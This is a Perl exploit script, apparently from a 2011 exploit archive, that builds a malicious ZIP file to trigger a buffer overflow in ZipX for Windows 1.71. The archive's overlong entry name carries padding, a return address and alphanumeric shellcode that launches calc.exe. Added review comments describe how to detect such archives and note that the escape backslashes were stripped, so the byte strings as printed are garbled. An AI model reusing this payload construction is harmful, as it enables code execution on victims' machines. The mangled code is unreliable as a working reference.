
# Title : ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
# Published : 2011-09-05
# Author :


#!/usr/bin/perl
#
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
#[+]Date: 0592011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html
#[+]Version: v1.71
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#Reproduce:
#Open the zip file, then click "Encrypt", type your password and click "Ok" BOOM!!! 
#See the calc.exe
#


use strict;
use warnings;

# Writes a single-entry ZIP archive to disk. The entry's name is the ~4 KB
# string assembled below from padding runs and a few fixed byte sequences;
# $head, $head2 and $head3 are the ZIP local file header, central directory
# record and end-of-central-directory record (signatures PK\x03\x04,
# PK\x01\x02 and PK\x05\x06 respectively).
#
# NOTE(review): every byte string in this listing is written as "x50x4B..."
# and the printed messages use "n"/"tt" -- the backslashes of the escape
# sequences appear to have been stripped when the page was captured. As
# printed these are literal ASCII letters, not the bytes the comments name;
# the byte-level notes below describe what the constants evidently encode.
#
# Detection notes (defender's view), each checkable against the constants:
#   - the central directory record declares a name length of "xe4x0f"
#     = 0x0FE4 = 4068 bytes, which equals the 4064-byte padded string plus
#     ".rar"; the end-of-central-directory record declares exactly one
#     entry (the "x01x00x01x00" pair).
#   - the name is mostly long homogeneous runs ("A" x 330, "C" padding,
#     "B" padding to 4064) and carries the alphanumeric shellcode string.
#     Archive inspection that flags entry names thousands of bytes long, or
#     names containing long repeated-byte runs, catches this shape without
#     any knowledge of the targeted product.
#   - the name is stored twice (local header and central directory), so a
#     name-length check has to cover both records, not just the first.
my $filename = "Exploit.zip"; 

# Banner; the escapes here are garbled as noted above ("n" should be a newline).
print "nnttZipX for Windows v1.71 ZIP File Buffer Overflow Exploitn";
print "ttCreated by C4SS!0 G0M3Sn";
print "ttE-mail louredo_@hotmail.comn";
print "ttSite http://net-fuzzer.blogspot.com/nn";
sleep(1);

print "tt[+]Creating ZIP File...n";
sleep(1);
# Local file header (30 bytes when the escapes are intact): signature,
# version, flags, method, mod time/date, CRC, sizes, name length, extra length.
# NOTE(review): counting the bytes as written, "xe4x0f" lands one byte
# before the usual name-length offset -- verify whether that is an author
# error or a capture artefact before relying on this record's field values.
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

# Central directory record (46 bytes): "xe4x0f" at offset 28 is the
# name-length field, 0x0FE4 = 4068; "x01x00" is the internal-attributes
# field and "x24x00x00x00" the external attributes.
my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

# End-of-central-directory record (22 bytes): one entry on this disk and in
# total; central directory size 0x1012 (46 + 4068) at offset 0x1002
# (30 + 4068) -- both consistent with a single 4068-byte entry name.
my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

my $shellcode = 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUK" .
"VPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMM" .
"PV261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7Z" . # Shellcode WinExec "calc.exe"
"UXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWW" . # Alpha Numeric Shellcode BaseAddress EAX
"LNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1" .
"BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWNKRKJ8JSNS4YMMOHT3Z" .
"QJOHQ4QJUQLN1VSLV5S1QYO0YA";
# The entry name: fixed-width padding runs around short byte sequences, then
# the shellcode, then padding out to exactly 4064 bytes before ".rar".
my $payload = "A" x 330;
$payload .= 
("x66x05x4DxCD" x 4).
"x66x05x19x18". # ADD AX,1819
"x54x5Ax50x5B". # PUSH ESP # POP EDX # PUSH EAX # POP EBX
"x2BxE0". # After conversion SUB EDX,EBX
"x52x58". # PUSH EDX # POP EAX
"x98xd1"; # CALL EAX
$payload .= "C" x (371-length($payload));
$payload .= "x3Cx01x75xd1"; # Converted is that "x3cx04x75xd0"
$payload .= pack('V',0x0041334d); # P/P/RET
$payload .= $shellcode;
$payload .= "B" x (4064-length($payload));
$payload = $payload.".rar";
# File layout: local header, name, central directory, name again, EOCD.
my $zip = $head.$payload.$head2.$payload.$head3;
# style: bareword handle and 2-arg open; prefer
# `open my $fh, '>', $filename or die ...`. $filename is a fixed literal
# here so there is no mode-injection risk, but close() is not checked, so a
# short write would go unnoticed.
open(FILE,">$filename") || die "tt[-]Error:n$!n";
print FILE $zip;
close(FILE);
print "tt[+] ZIP File Created With Sucess:)n";
sleep(3);